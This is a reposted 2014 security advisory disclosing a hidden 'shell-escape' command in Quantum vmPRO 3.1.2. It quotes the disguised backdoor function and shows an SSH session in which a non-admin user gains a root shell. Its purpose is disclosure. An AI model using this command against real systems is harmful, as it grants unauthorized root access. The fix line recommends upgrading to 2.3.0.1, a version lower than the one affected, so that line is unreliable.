首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Quantum vmPRO 3.1.2 - Privilege Escalation
来源:xistence[at]0x90[.]nl 作者:xistence 发布时间:2014-03-20  
-----------
Author:
-----------
  
xistence < xistence[at]0x90[.]nl >
  
-------------------------
Affected products:
-------------------------
  
Quantum vmPRO 3.1.2 and below
  
-------------------------
Affected vendors:
-------------------------
  
Quantum
http://quantum.com/
  
-------------------------
Product description:
-------------------------
  
Unlike traditional backup applications and other backup applications
designed for virtual environments,
Quantum vmPRO Software backs up VMs in native VMware format. This enables
users to restore or boot VMs
in seconds without the use of a backup application, reduces virtual server
and network usage by reducing
VM image sizes before backing up those images to backup storage, and
substantially reduces the cost of
using traditional backup applications to back up virtual environments.
  
----------
Details:
----------
  
[ 0x01 - Shell Backdoor Command ]
  
The file "/usr/local/pancetera/bin/cmd_processor.py" on the vmPRO 3.1.2
virtual machine contains the following lines:
  
    def cmd_shell_escape(self, args):
        log_panshell(syslog.LOG_INFO, "internal consistency check started")
        env = dict(os.environ)
        env['SHELL'] = '/bin/bash'
        env['HOME']  = '/tmp'
        env['TERM']  = 'xterm'
        os.spawnle(os.P_WAIT, '/bin/bash', 'bash', env)
        log_panshell(syslog.LOG_INFO, "internal consistency check finished")
        return
  
This is a hidden command to gain a root shell. If we create a user in the
web interface without administrator rights,
we can still ssh and gain a root shell! This of course should not be
possible and only be accessible to an admin user.
  
$ ssh non-admin@192.168.2.112
non-admin@192.168.2.112's password:
Last login: Thu Dec 19 23:42:10 2013 from 192.168.2.72
Welcome to Quantum vmPRO Console
--------------------------------
  
Quantum vmPRO GUI: https://192.168.2.112/
  
*** Type 'help' for a list of commands.
  
quantum:localhost> shell-escape
bash-4.1# id
uid=0(root) gid=100(users) groups=0(root),100(users)
  
  
-----------
Solution:
-----------
  
Upgrade to version 2.3.0.1 or newer
  
--------------
Timeline:
--------------
  
03-01-2014 - Issues discovered and vendor notified
15-01-2014 - No reply, asked for status update.
17-03-2014 - No replies, public disclosure

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SePortal 2.5 - SQL Injection V
·Loadbalancer.org Enterprise VA
·MP3Info 0.8.5a - SEH Buffer Ov
·Quantum DXi V1000 2.2.1 - Stat
·Loadbalancer.org Enterprise VA
·Array Networks vAPV / vxAG Cod
·Quantum vmPRO Backdoor Command
·Quantum DXi V1000 SSH Private
·NTP Spoofed "monlist query" De
·Wireless Drive v1.1.0 iOS - Mu
·Array Networks vxAG / xAPV Pri
·EaseUS Todo Backup 5.8.0.0 Har
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved